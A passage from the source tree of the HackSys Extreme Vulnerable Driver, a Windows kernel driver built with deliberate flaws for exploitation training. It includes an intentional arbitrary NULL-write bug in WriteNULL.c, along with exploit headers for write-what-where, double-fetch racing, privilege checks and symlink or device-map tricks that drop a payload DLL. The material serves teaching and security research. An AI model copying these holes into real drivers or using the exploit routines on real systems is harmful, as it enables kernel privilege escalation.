// Byte-array object whose length mirrors USE_AFTER_FREE_NON_PAGED_POOL_NX
// (one pointer plus 0x54 bytes). As with the NonPagedPool variant, the real
// object is pointer-aligned and may carry tail padding on x64 while this
// CHAR array is not, so sizeof() of the two may differ.
//
typedef struct _FAKE_OBJECT_NON_PAGED_POOL_NX
{
    CHAR Buffer[0x54 + sizeof(PVOID)];  // same nominal size as the real object
} FAKE_OBJECT_NON_PAGED_POOL_NX, *PFAKE_OBJECT_NON_PAGED_POOL_NX;
73 |
74 |
75 | //
76 | // Function Definitions
77 | //
78 |
//
// Callback routine of the use-after-free (NonPagedPoolNx) module; presumably
// the value installed in the Callback slot at allocation -- confirm in the
// .c file.
//
VOID
UaFObjectCallbackNonPagedPoolNx(
    VOID
    );

//
// Use / Free / Allocate operate on module-level object state that is not
// declared in this header; the IOCTL issue order decides whether Use sees a
// live or a freed object, so lifetime tracking belongs in the implementation.
// Each returns an NTSTATUS.
//
NTSTATUS
UseUaFObjectNonPagedPoolNx(
    VOID
    );

NTSTATUS
FreeUaFObjectNonPagedPoolNx(
    VOID
    );

NTSTATUS
AllocateUaFObjectNonPagedPoolNx(
    VOID
    );

//
// Allocates a pool object from a user-supplied FAKE_OBJECT_NON_PAGED_POOL_NX.
// UserFakeObject is a raw user-mode pointer; probing is the implementation's
// responsibility. Returns an NTSTATUS.
//
NTSTATUS
AllocateFakeObjectNonPagedPoolNx(
    _In_ PFAKE_OBJECT_NON_PAGED_POOL_NX UserFakeObject
    );
103 |
104 | #endif // !__USE_AFTER_FREE_NON_PAGED_POOL_NX_H__
105 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/WriteNULL.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | WriteNULL.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | Write NULL vulnerability.
48 |
49 | --*/
50 |
51 | #include "WriteNULL.h"
52 |
//
// Place both routines in the pageable code section; each one asserts
// PAGED_CODE() at the top of its body, so this is consistent with that.
//
#ifdef ALLOC_PRAGMA
#pragma alloc_text(PAGE, TriggerWriteNULL)
#pragma alloc_text(PAGE, WriteNULLIoctlHandler)
#endif // ALLOC_PRAGMA
57 |
58 |
///
/// Trigger the Write NULL Vulnerability
///
/// Reads one pointer out of the caller-supplied user-mode buffer and stores
/// NULL through it. Only the outer buffer (UserBuffer itself) is probed in
/// every build; whether the fetched inner pointer is probed before the store
/// depends on the SECURE build flag.
///
/// The pointer to user mode buffer
/// NTSTATUS - STATUS_SUCCESS, or the exception code if the access faulted
///
NTSTATUS
TriggerWriteNULL(
    _In_ PVOID UserBuffer
    )
{
    NTSTATUS Status = STATUS_SUCCESS;

    PAGED_CODE();

    __try
    {
        //
        // Verify if the buffer resides in user mode
        //
        // This probe covers UserBuffer only, i.e. the location the inner
        // pointer is read from -- not the location that inner pointer
        // refers to.
        //

        ProbeForRead(UserBuffer, sizeof(PVOID), (ULONG)__alignof(PVOID));

        //
        // Grab the user pointer to nullify to avoid race condition
        //
        // Taking a single local copy prevents a double fetch of
        // *UserBuffer, but says nothing about where the copied pointer
        // points; that check is the ProbeForWrite() in the SECURE path.
        //

        PVOID UserPointerToNullify = *(PVOID *)UserBuffer;

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserPointerToNullify: 0x%p\n", UserPointerToNullify);

#ifdef SECURE

        //
        // Secure Note: This is secure because the developer is properly validating if
        // '*(UserBuffer)' resides in User mode by calling ProbeForWrite() routine before
        // performing the write operation
        //
        // ProbeForWrite() raises if the address is not a writable user-mode
        // address, which the __except below turns into a failure status.
        //

        ProbeForWrite(UserPointerToNullify, sizeof(PVOID), (ULONG)__alignof(PVOID));

        *(PVOID *)UserPointerToNullify = NULL;
#else
        DbgPrint("[+] Triggering Arbitrary NULL Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary NULL Write vulnerability
        // because the developer is writing NULL to the memory pointed by '*(UserBuffer)'
        // without properly validating if it resides in User mode
        //
        // Note that the __except handler does not help here: a store to a
        // valid kernel address does not fault, so it completes silently and
        // the routine still reports STATUS_SUCCESS. Only an unmapped target
        // is surfaced as an exception code.
        //

        *(PVOID *)UserPointerToNullify = NULL;
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        //
        // The raw exception code is returned as the NTSTATUS.
        //

        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}
121 |
122 |
///
/// Write NULL Ioctl Handler
///
/// Pulls the input buffer pointer out of the current stack location and
/// forwards it to TriggerWriteNULL(). Type3InputBuffer is the raw,
/// unvalidated user-mode pointer of the request, so the only rejection made
/// here is a NULL pointer; all further probing is left to the trigger routine.
///
/// The pointer to IRP
/// The pointer to IO_STACK_LOCATION structure
/// NTSTATUS - STATUS_UNSUCCESSFUL when no buffer was supplied, otherwise
///            whatever TriggerWriteNULL() returns
///
NTSTATUS
WriteNULLIoctlHandler(
    _In_ PIRP Irp,
    _In_ PIO_STACK_LOCATION IrpSp
    )
{
    PVOID InputBuffer;

    UNREFERENCED_PARAMETER(Irp);
    PAGED_CODE();

    InputBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;

    //
    // A missing buffer is the one case handled at this level.
    //

    if (InputBuffer == NULL)
    {
        return STATUS_UNSUCCESSFUL;
    }

    return TriggerWriteNULL(InputBuffer);
}
150 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/WriteNULL.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | WriteNULL.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | write NULL module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __WRITE_NULL_H__
54 | #define __WRITE_NULL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
//
// Trigger routine of the write NULL module (defined in WriteNULL.c).
// UserBuffer is a raw user-mode pointer forwarded by WriteNULLIoctlHandler;
// the implementation probes it before use. Returns an NTSTATUS.
//
NTSTATUS
TriggerWriteNULL(
    _In_ PVOID UserBuffer
    );
67 |
68 | #endif // !__WRITE_NULL_H__
69 |
--------------------------------------------------------------------------------
/Exploit/ArbitraryOverwrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryOverwrite.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Arbitrary Memory Overwrite Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __ARBITRARY_OVERWRITE_H__
53 | #define __ARBITRARY_OVERWRITE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
//
// Request layout handed to the driver's arbitrary overwrite IOCTL. As the
// field names indicate, What is the source and Where the destination of
// the write; confirm that this matches the driver-side definition in
// Driver/HEVD/Windows/ArbitraryWrite.h, since the two must agree byte for byte.
//
typedef struct _WRITE_WHAT_WHERE {
    PULONG_PTR What;    // pointer to the value to write
    PULONG_PTR Where;   // pointer to the location written
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
63 |
//
// Thread entry point (CreateThread signature) for this module's routine;
// Parameter is the LPVOID thread argument, its type is fixed by the caller
// in the .c file. Returns the thread exit code.
//
DWORD WINAPI ArbitraryOverwriteThread(LPVOID Parameter);
65 |
66 | #endif //__ARBITRARY_OVERWRITE_H__
67 |
--------------------------------------------------------------------------------
/Exploit/DoubleFetch.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | DoubleFetch.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Double Fetch Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __DOUBLE_FETCH_H__
53 | #define __DOUBLE_FETCH_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #pragma comment(lib, "psapi.lib")
60 |
//
// Upper bound on the number of racing threads this module will create;
// how it is enforced is up to the implementation in DoubleFetch.c.
//
#define MAXIMUM_THREADS_ALLOWED 100
62 |
//
// Request layout for the driver's double fetch IOCTL: a user buffer and its
// length. Both fields live in user memory and are read by the driver more
// than once, which is the condition the module exercises; confirm the
// layout against the driver-side definition in Driver/HEVD/Windows/DoubleFetch.h.
//
typedef struct _DOUBLE_FETCH {
    PVOID Buffer;   // user-mode buffer pointer
    SIZE_T Size;    // length the driver reads from this structure
} DOUBLE_FETCH, *PDOUBLE_FETCH;
67 |
//
// Argument block passed to each DoubleFetchThread via its LPVOID parameter.
// The DOUBLE_FETCH it points to is shared between threads, so its lifetime
// must outlive every thread that receives this block.
//
typedef struct _RACING_THREAD_PARAMETER {
    HANDLE DeviceHandle;        // open handle to the device
    PDOUBLE_FETCH DoubleFetch;  // shared request structure
} RACING_THREAD_PARAMETER, *PRACING_THREAD_PARAMETER;
72 |
//
// Thread entry point (CreateThread signature). Parameter is presumably a
// PRACING_THREAD_PARAMETER -- confirm in DoubleFetch.c. Returns the thread
// exit code.
//
DWORD WINAPI DoubleFetchThread(LPVOID Parameter);
74 |
75 | #endif //__DOUBLE_FETCH_H__
76 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | HackSysEVDExploit.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | main exploit module handling the exploitation routines.
48 |
49 | --*/
50 |
51 | #ifndef __EXPLOIT_H__
52 | #define __EXPLOIT_H__
53 |
54 | #pragma once
55 |
56 | #include "arg.h"
57 | #include "Common.h"
58 |
/*
 * Vulnerability classes the exploit binary knows how to drive. Values are
 * implicit (DoubleFetch == 0, counting up), so the enumerator order is part
 * of the interface and must stay stable.
 */
enum _VULNERABILITY_TYPE {
    DoubleFetch,
    PoolOverflow,
    UseAfterFree,
    TypeConfusion,
    StackOverflow,
    IntegerOverflow,
    StackOverflowGS,
    ArbitraryOverwrite,
    NullPointerDereference,
    InsecureKernelFileAccess,
    UninitializedHeapVariable,
    UninitializedStackVariable
};
typedef enum _VULNERABILITY_TYPE VULNERABILITY_TYPE;
typedef VULNERABILITY_TYPE *PVULNERABILITY_TYPE;
73 |
/*
 * Pairs a command keyword with the VULNERABILITY_TYPE it selects
 * (presumably matched against argv; confirm in HackSysEVDExploit.c).
 */
struct _EXPLOIT_VULNERABILITY {
    PTCHAR Command;                        /* keyword text */
    VULNERABILITY_TYPE VulnerabilityType;  /* case selected by Command */
};
typedef struct _EXPLOIT_VULNERABILITY EXPLOIT_VULNERABILITY;
typedef EXPLOIT_VULNERABILITY *PEXPLOIT_VULNERABILITY;
78 |
/* Returns TRUE when the named process runs with higher privilege than the
 * caller expects; used to confirm a successful escalation (definition in
 * HackSysEVDExploit.c, not visible here). */
BOOL IsProcessHavingHigherPrivilege(LPCSTR TargetProcess);

/* Runs the handler for the selected vulnerability on a dedicated thread and
 * presumably waits for it; see LaunchExploitThread in the .c. */
VOID LaunchExploitThread(LPTHREAD_START_ROUTINE ExploitHandlerThread);

/* Dispatches on ExploitVulnerability->VulnerabilityType. */
VOID Exploit(PEXPLOIT_VULNERABILITY ExploitVulnerability);

/* Prints command-line usage for the given process name.
 * NOTE(review): declared static in a header, so every translation unit that
 * includes this file gets its own internal-linkage declaration; it only makes
 * sense if HackSysEVDExploit.c is the sole includer. Consider moving the
 * declaration into the .c. */
static VOID ShowUsage(PTCHAR Process);
83 |
84 | #endif //__EXPLOIT_H__
85 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HackSysEVDExploit", "HackSysEVDExploit.vcxproj", "{A432D8CD-BCEA-49B5-81EE-20B926D7421A}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.Build.0 = Debug|Win32
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.ActiveCfg = Release|Win32
15 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}
15 | HackSysEVDExploit
16 | HackSysEVDExploit
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | Level3
44 | Disabled
45 |
46 |
47 | true
48 |
49 |
50 |
51 |
52 | Level3
53 | MaxSpeed
54 | true
55 | true
56 |
57 |
58 | true
59 | true
60 | true
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | Source Files
29 |
30 |
31 | Source Files
32 |
33 |
34 | Source Files
35 |
36 |
37 | Source Files
38 |
39 |
40 | Source Files
41 |
42 |
43 | Source Files
44 |
45 |
46 | Source Files
47 |
48 |
49 | Source Files
50 |
51 |
52 | Source Files
53 |
54 |
55 | Source Files
56 |
57 |
58 | Source Files
59 |
60 |
61 | Source Files
62 |
63 |
64 |
65 |
66 | Header Files
67 |
68 |
69 | Header Files
70 |
71 |
72 | Header Files
73 |
74 |
75 | Header Files
76 |
77 |
78 | Header Files
79 |
80 |
81 | Header Files
82 |
83 |
84 | Header Files
85 |
86 |
87 | Header Files
88 |
89 |
90 | Header Files
91 |
92 |
93 | Header Files
94 |
95 |
96 | Header Files
97 |
98 |
99 | Header Files
100 |
101 |
102 | Header Files
103 |
104 |
105 | Header Files
106 |
107 |
108 | Header Files
109 |
110 |
111 | Header Files
112 |
113 |
114 |
--------------------------------------------------------------------------------
/Exploit/InsecureKernelResourceAccess.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | InsecureKernelResourceAccess.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Insecure Kernel Resource Access Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __INSECURE_KERNEL_RESOURCE_ACCESS_H__
53 | #define __INSECURE_KERNEL_RESOURCE_ACCESS_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
/* Object-manager helpers (implemented in InsecureKernelResourceAccess.c, not
 * visible here). Each returns a HANDLE opened relative to hRoot; callers are
 * responsible for closing it. */
HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR DirectoryName);
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR DirectoryName);
HANDLE CreateSymlink(HANDLE hRoot, LPCWSTR SymbolicLinkName, LPCWSTR TargetName);

/* Points the current process's device map at DirectoryHandle; returns the
 * NTSTATUS of the underlying call. */
NTSTATUS SetProcessDeviceMap(HANDLE DirectoryHandle);

/* Writes the payload DLL to szPath and starts the WMI host process.
 * NOTE(review): both prototypes use empty parentheses / no error return, so
 * failures cannot be reported to the caller; `VOID LaunchWMIProcess(VOID);`
 * would at least make the no-argument contract explicit in C. */
